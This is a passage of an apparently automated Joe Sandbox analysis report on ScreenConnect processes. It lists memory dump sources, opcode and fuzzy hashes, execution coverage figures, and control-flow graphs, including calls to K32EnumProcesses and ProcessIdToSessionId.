                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 9ff59ac5c80fc612efe010c0fd078fd040a19d829fccff6e30e54f96495a5890
                                                                                                                                                                                • Instruction ID: ab1fd10747f783c68ae143f0f9a8b0ea39522d685cd54ea2a82908887241bb85
                                                                                                                                                                                • Opcode Fuzzy Hash: 9ff59ac5c80fc612efe010c0fd078fd040a19d829fccff6e30e54f96495a5890
                                                                                                                                                                                • Instruction Fuzzy Hash: 6D11543590024A9FCF41DFA8C9409DEBFF1EF4A314B148596D949BF261D731AA0ACB90
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2461982849.0000000000B0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B0D000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b0d000_ScreenConnect.jbxd
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a76c81603a23581356cffb60c93174ff6396db4c2f4b006e16be6303e386bc9b
                                                                                                                                                                                • Instruction ID: ad9e730d69f6c2170ad39585a1d5f05791fb898a354682bcdf5456f30b756968
                                                                                                                                                                                • Opcode Fuzzy Hash: a76c81603a23581356cffb60c93174ff6396db4c2f4b006e16be6303e386bc9b
                                                                                                                                                                                • Instruction Fuzzy Hash: AAE07D37C8B000C6DA14904C58814F1E3EDCEFBB3671041F3C14C8710AD548021BC621
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: d062e72419c5b47f6c3232e15272cd12fc990bcdf956619e81a0ea12af250e0b
                                                                                                                                                                                • Instruction ID: 3b70c16aa27553aa03f961441f23a29eb622ea5b1b5c42390a1a62b0c31915f5
                                                                                                                                                                                • Opcode Fuzzy Hash: d062e72419c5b47f6c3232e15272cd12fc990bcdf956619e81a0ea12af250e0b
                                                                                                                                                                                • Instruction Fuzzy Hash: DAE09B36705E905FC721566858D4065BFD9CEAA255B3C85F1F4A5CB292E519CC134341
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: be65bd25e2b245697b3e91795800410901527624aaac6b9c52634d748a56b0bc
                                                                                                                                                                                • Instruction ID: 8aaa12c04dafea191c5dd0a558a1403a3c796ee9d7389ebbcd6aeb84d5c795c9
                                                                                                                                                                                • Opcode Fuzzy Hash: be65bd25e2b245697b3e91795800410901527624aaac6b9c52634d748a56b0bc
                                                                                                                                                                                • Instruction Fuzzy Hash: ECE0E5397042545FC3451738A8184AA3FE9DECA221314816BE506C33B2CE749C0687E0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 103fa1a1ba386352f523dcd87d7a212215cbb705627520900c94ca299f84a2e4
                                                                                                                                                                                • Instruction ID: 8297d2c059422186990158210a56bc2af4aeff60e5f1cb02f280d68acac63724
                                                                                                                                                                                • Opcode Fuzzy Hash: 103fa1a1ba386352f523dcd87d7a212215cbb705627520900c94ca299f84a2e4
                                                                                                                                                                                • Instruction Fuzzy Hash: 48F0A0363016008B8316E66DF820D9E37D9DBC4750354847EE019C7214EF25EC0A9B81
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 97599cbee2f7fcf1511541e324b53ec535cbc183d11163f2a143c4113d5b5f19
                                                                                                                                                                                • Instruction ID: b98d1365dc83ca708b7dd8d297ebf18a34d105188d1e499f2e01164a262b4419
                                                                                                                                                                                • Opcode Fuzzy Hash: 97599cbee2f7fcf1511541e324b53ec535cbc183d11163f2a143c4113d5b5f19
                                                                                                                                                                                • Instruction Fuzzy Hash: 24E086323003149B97146BAE788C56FBADEEBC8A62794847DF60EC3340DE759C0683A5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a5815e90f1d8e03e75e59cf917ccb3f00390bed24cf27d4a64b5baa11362c733
                                                                                                                                                                                • Instruction ID: 1a34c17b8a6d6f8765b28179b423ed9f4dfaa0703f26cfe357fe8559b9cb7472
                                                                                                                                                                                • Opcode Fuzzy Hash: a5815e90f1d8e03e75e59cf917ccb3f00390bed24cf27d4a64b5baa11362c733
                                                                                                                                                                                • Instruction Fuzzy Hash: 74E08C32B01D51AB8B20915C9954555B3CE8BA93A5F3D86B1F928CB380FA2ADC124380
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 03a5ee63067ec5a7cc0f84caadf4224d626502f5a4109eb4656400fb0bb80c74
                                                                                                                                                                                • Instruction ID: d6a404265ab87856017bb8f9afbc06a959f4cd2be7f5fa79aa32299590275660
                                                                                                                                                                                • Opcode Fuzzy Hash: 03a5ee63067ec5a7cc0f84caadf4224d626502f5a4109eb4656400fb0bb80c74
                                                                                                                                                                                • Instruction Fuzzy Hash: 52E06D31505248BFCB01DB74D811A8A7BF8EF06300B1141EAD844DB262DA306E169745
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: ee74eec98717d77509fe28b44cf90cc4ed91a7659934fe7f1b1796ecc4e0dc78
                                                                                                                                                                                • Instruction ID: f489527dc926a60047be19e605e94d6abe2dc607b17b67f2965665bde9c8e3bb
                                                                                                                                                                                • Opcode Fuzzy Hash: ee74eec98717d77509fe28b44cf90cc4ed91a7659934fe7f1b1796ecc4e0dc78
                                                                                                                                                                                • Instruction Fuzzy Hash: 9CE0923960A680CFC7066B70981C49C7FB1EF0621138980E6D84A8B263CF358D06CB41
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: a99d83e5f6ab914e20d3c1d58d58682eb48d560c5222b32a611ec90727c50f10
                                                                                                                                                                                • Instruction ID: 0ebcc9382dc98dcf020d3e995493282ab8378bb25b6d0ea00bd7102031ada307
                                                                                                                                                                                • Opcode Fuzzy Hash: a99d83e5f6ab914e20d3c1d58d58682eb48d560c5222b32a611ec90727c50f10
                                                                                                                                                                                • Instruction Fuzzy Hash: 66E0927450A288DFD741DFB4AA555EC7FB9DE0620070081DAD84997162D5306F0AAB41
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 11d08277b84ef1a061483f37fa44b64c3bfc7516089b03696fa126b7ff96cd13
                                                                                                                                                                                • Instruction ID: c851ae7a3c204edaad75331c71e07f6d901f1deeb10c9b60061fad5c4d2f2cd5
                                                                                                                                                                                • Opcode Fuzzy Hash: 11d08277b84ef1a061483f37fa44b64c3bfc7516089b03696fa126b7ff96cd13
                                                                                                                                                                                • Instruction Fuzzy Hash: 19E0923111C3D00FC316D778B8506DC7FE1DE82214B080AEAD0C14B167C654BA0E93A9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000006.00000002.2462248041.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_6_2_b60000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 8d27dbdcb808e6538bcb9c6e3e0a13a91de4b9b18304e4f7d2cf4b990c4cbede

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:10.9%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:36
                                                                                                                                                                                Total number of Limit Nodes:6
                                                                                                                                                                                execution_graph 31745 56e3468 31746 56e348c 31745->31746 31747 56e349c 31745->31747 31748 56e3495 31746->31748 31749 56e35e8 4 API calls 31746->31749 31750 56e35d7 4 API calls 31746->31750 31753 56e35e8 31747->31753 31760 56e35d7 31747->31760 31749->31746 31750->31746 31754 56e360d 31753->31754 31756 56e361d 31753->31756 31755 56e3616 31754->31755 31781 56e2940 31754->31781 31755->31746 31767 56e3768 31756->31767 31774 56e3757 31756->31774 31762 56e35e7 31760->31762 31763 56e3616 31760->31763 31761 56e360d 31761->31763 31764 56e2940 ProcessIdToSessionId 31761->31764 31762->31761 31765 56e3768 2 API calls 31762->31765 31766 56e3757 2 API calls 31762->31766 31763->31746 31764->31761 31765->31761 31766->31761 31772 56e3792 31767->31772 31773 56e377f 31767->31773 31768 56e3788 31768->31754 31769 56e38fa K32EnumProcesses 31770 56e3932 31769->31770 31770->31754 31772->31773 31784 56e294c 31772->31784 31773->31768 31773->31769 31778 56e3768 31774->31778 31775 56e3788 31775->31754 31776 56e38fa K32EnumProcesses 31777 56e3932 31776->31777 31777->31754 31779 56e294c K32EnumProcesses 31778->31779 31780 56e377f 31778->31780 31779->31778 31780->31775 31780->31776 31782 56e39a0 ProcessIdToSessionId 31781->31782 31783 56e3a13 31782->31783 31783->31754 31785 56e38a8 K32EnumProcesses 31784->31785 31787 56e3932 31785->31787 31787->31772

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 0 39910c0-3991175 call 39917d7 14 39911b8-399131e 0->14 15 3991177-399118d 0->15 49 3991327-39913e5 14->49 18 399118f 15->18 19 3991196-39911b6 15->19 18->19 19->14
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 4']q$4']q$4']q$4']q$4']q
                                                                                                                                                                                • API String ID: 0-4248691736

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 65 39910d0-3991175 call 39917d7 77 39911b8-399131e 65->77 78 3991177-399118d 65->78 112 3991327-39913e5 77->112 81 399118f 78->81 82 3991196-39911b6 78->82 81->82 82->77
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 4']q$4']q$4']q$4']q$4']q
                                                                                                                                                                                • API String ID: 0-4248691736

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 128 11dc67f-11dc6b1 131 11dc6b3-11dc6e4 128->131 132 11dc6f2-11dc726 128->132 131->132 133 11dc72c-11dc744 132->133 134 11dca57-11dca5e 132->134 139 11dc766-11dc781 133->139 140 11dc746-11dc761 133->140 195 11dc786 call 11dcbb0 139->195 196 11dc786 call 11dcbc0 139->196 145 11dc80e-11dc811 140->145 197 11dc816 call 11df94f 145->197 198 11dc816 call 11df950 145->198 146 11dc78c-11dc7d4 199 11dc7d7 call 11ded38 146->199 200 11dc7d7 call 11ded28 146->200 201 11dc7d7 call 11decb1 146->201 202 11dc7d7 call 11decc0 146->202 147 11dc81c-11dc823 148 11dc829-11dc83f call 11d5c2c 147->148 149 11dca2b-11dca3e 147->149 157 11dc857-11dc880 148->157 158 11dc841-11dc847 148->158 152 11dca45-11dca49 149->152 155 11dca4b 152->155 156 11dca54 152->156 155->156 156->134 157->149 166 11dc886-11dc88c 157->166 159 11dc849 158->159 160 11dc84b-11dc84d 158->160 159->157 160->157 161 11dc7da-11dc800 167 11dc80b 161->167 168 11dc802 161->168 169 11dca40 166->169 170 11dc892-11dc8a9 166->170 167->145 168->167 169->152 170->169 172 11dc8af-11dc8d3 170->172 175 11dca1e-11dca25 172->175 176 11dc8d9-11dc972 call 11daab0 call 11db5a8 172->176 175->149 175->166 176->149 183 11dc978-11dc986 176->183 185 11dc988-11dc9ac 183->185 186 11dc9b1-11dc9c8 183->186 185->152 203 11dc9cb call 11dfa08 186->203 204 11dc9cb call 11df9e0 186->204 189 11dc9d1-11dca1c call 11d5c3c 189->152 195->146 196->146 197->147 198->147 199->161 200->161 201->161 202->161 203->189 204->189
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $]q$$]q
                                                                                                                                                                                • API String ID: 0-127220927

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 205 39933c2-3993418 212 399341a-399342e 205->212 213 3993452-3993481 205->213 216 3993430 212->216 217 3993437-3993447 212->217 222 3993483-3993499 213->222 223 39934c4-39934eb call 39928e0 213->223 216->217 217->213 227 399349b 222->227 228 39934a2-39934c2 222->228 284 39934ee call 3993830 223->284 285 39934ee call 3993860 223->285 227->228 228->223 233 39934f0-3993501 234 399355c-399356b 233->234 235 3993503-399351d 233->235 236 399356d-3993581 234->236 237 39935b0-39935d7 234->237 244 399374e 235->244 245 3993523-399354b 235->245 241 399358a-39935ae 236->241 242 3993583 236->242 248 39935d9-399360f 237->248 249 3993612-3993636 237->249 241->237 242->241 251 3993753-3993764 244->251 286 399354d call 3995021 245->286 287 399354d call 3995030 245->287 248->249 255 3993638-399366f 249->255 256 3993671-399369b 249->256 255->256 288 399369d call 3995410 256->288 289 399369d call 3995403 256->289 266 3993553-399355a 266->234 266->235 268 39936a3-39936b7 271 3993739-399374c 268->271 272 39936bd-39936d7 268->272 271->251 272->244 275 39936d9-399370a 272->275 280 399370c-3993728 275->280 281 3993730-3993737 275->281 280->281 281->271 281->272 284->233 285->233 286->266 287->266 288->268 289->268
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: ##$S!
                                                                                                                                                                                • API String ID: 0-4091637039
                                                                                                                                                                                • Opcode ID: ea195f8b23f8f38d79994a36498d5aba8b5ff086bf269039adecd82dc7b90987
                                                                                                                                                                                • Instruction ID: 3c65b87d34a65d3f641cdf3d760a29e6113c3b31d79f06fe517ce6f2bda61483
                                                                                                                                                                                • Opcode Fuzzy Hash: ea195f8b23f8f38d79994a36498d5aba8b5ff086bf269039adecd82dc7b90987
                                                                                                                                                                                • Instruction Fuzzy Hash: 9AA1B235A002059FDB19EF6DD580A5EBBF6EF84340B19C9AAD4099B364DF35EC06CB80

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (&]q$(aq
                                                                                                                                                                                • API String ID: 0-1602648543
                                                                                                                                                                                • Opcode ID: b40d25177ebd98b8314e82ed93029249601ea59d14340612e6ca2531826031b7
                                                                                                                                                                                • Instruction ID: 509ea46c7e0eb833106d741c94dfd4f3f3ae8a62ad9e5e44416a69b153c73221
                                                                                                                                                                                • Opcode Fuzzy Hash: b40d25177ebd98b8314e82ed93029249601ea59d14340612e6ca2531826031b7
                                                                                                                                                                                • Instruction Fuzzy Hash: 64616031F0021A8BDB19EBB9C4506AEBAE2AFC5700F148569D506BB385DF34AE47C791

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: `Q]q$`Q]q
                                                                                                                                                                                • API String ID: 0-3952371890
                                                                                                                                                                                • Opcode ID: eb7ba1f797da69b48d50b35e9bace909ad2eccef723cd297b06e7ed2b2fd8459
                                                                                                                                                                                • Instruction ID: c526c10f4c26123a7efbc3399cbf97399c980fa46772825a643e338e1c9fd79f
                                                                                                                                                                                • Opcode Fuzzy Hash: eb7ba1f797da69b48d50b35e9bace909ad2eccef723cd297b06e7ed2b2fd8459
                                                                                                                                                                                • Instruction Fuzzy Hash: 3F41BD70A043299FDB64DF68C848BAEBBB5FB45300F0085E9D54CA7680DB785E48CF92

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 407 11d5410-11d541b 408 11d5421-11d5423 407->408 409 11d543b-11d543c 408->409 410 11d5425-11d542b 408->410 411 11d542d 410->411 412 11d542f-11d5431 410->412 411->409 412->409
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: $]q$$]q
                                                                                                                                                                                • API String ID: 0-127220927
                                                                                                                                                                                • Opcode ID: 2a89a66cf99b0e8e8af21c1975d6452dd402027937bc7744c29e55df1ca3b06f
                                                                                                                                                                                • Instruction ID: 19fc2d69282087506163f75201dbdf9cd442c0d53b4403dc302c7811f845a763
                                                                                                                                                                                • Opcode Fuzzy Hash: 2a89a66cf99b0e8e8af21c1975d6452dd402027937bc7744c29e55df1ca3b06f
                                                                                                                                                                                • Instruction Fuzzy Hash: 94D05E303802088FA76CCE6DD584A1133FABF44A013A104A5D9458B236EF30EC41C756

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 413: K32EnumProcesses
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3907213992.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_56e0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 430cc1608f44437f0d69fa487099afdfd7b715fb5caf89c574aec3d7736200da
                                                                                                                                                                                • Instruction ID: 953b73595c6634178a152290dd8e606100b731d7cdb6256f0b9b4cd0c1e90c77
                                                                                                                                                                                • Opcode Fuzzy Hash: 430cc1608f44437f0d69fa487099afdfd7b715fb5caf89c574aec3d7736200da
                                                                                                                                                                                • Instruction Fuzzy Hash: 9A518071A016058FCB24CF6AD884AAEBBF5FF88310F148A2ED45AD7750D734E905CBA1

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: d
                                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                                • Opcode ID: dbe8df8de5d717913a81686664cb911a94bb26eded775191e42b67ea77a75ab8
                                                                                                                                                                                • Instruction ID: 9568f4a858de5eaa7619230978454dc03fcfdabb99a8e4420f7f2bd860ba3119
                                                                                                                                                                                • Opcode Fuzzy Hash: dbe8df8de5d717913a81686664cb911a94bb26eded775191e42b67ea77a75ab8
                                                                                                                                                                                • Instruction Fuzzy Hash: 19D16F34A00715CFCB08DF68C988A99B7F5FF49310B118699E919AB365DB70ED86CB80

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 516 56e294c-56e38ee 518 56e38fa-56e3930 K32EnumProcesses 516->518 519 56e38f0-56e38f8 516->519 520 56e3939-56e3961 518->520 521 56e3932-56e3938 518->521 519->518 521->520
                                                                                                                                                                                APIs
                                                                                                                                                                                • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 056E391D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3907213992.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_56e0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: EnumProcesses
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 84517404-0
                                                                                                                                                                                • Opcode ID: 42e7a483249dea0b3e217097439fabb69d862e11bb8d1f587e0b388df566f66a
                                                                                                                                                                                • Instruction ID: 5f06e77fdafcf65506f15580f22a8ded75fc3fa82a00557492ce2da280e44181
                                                                                                                                                                                • Opcode Fuzzy Hash: 42e7a483249dea0b3e217097439fabb69d862e11bb8d1f587e0b388df566f66a
                                                                                                                                                                                • Instruction Fuzzy Hash: C52112B19012099FDB10CF9AC885AEEBBF4FB48320F10842EE519A7340D339A945CBA4

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 524 56e2940-56e3a11 ProcessIdToSessionId 526 56e3a1a-56e3a42 524->526 527 56e3a13-56e3a19 524->527 527->526
                                                                                                                                                                                APIs
                                                                                                                                                                                • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 056E39FE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3907213992.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_56e0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProcessSession
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3779259828-0

                                                                                                                                                                                APIs
                                                                                                                                                                                • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 056E39FE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3907213992.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_56e0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ProcessSession
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3779259828-0

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: C$z
                                                                                                                                                                                • API String ID: 0-414927723

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3889420081.00000000011D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011D0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_11d0000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (aq
                                                                                                                                                                                • API String ID: 0-600464949
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.3900112670.0000000003990000.00000040.00000800.00020000.00000000.sdmp, Offset: 03990000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_3990000_ScreenConnect.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: LR]q
                                                                                                                                                                                • API String ID: 0-3081347316
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
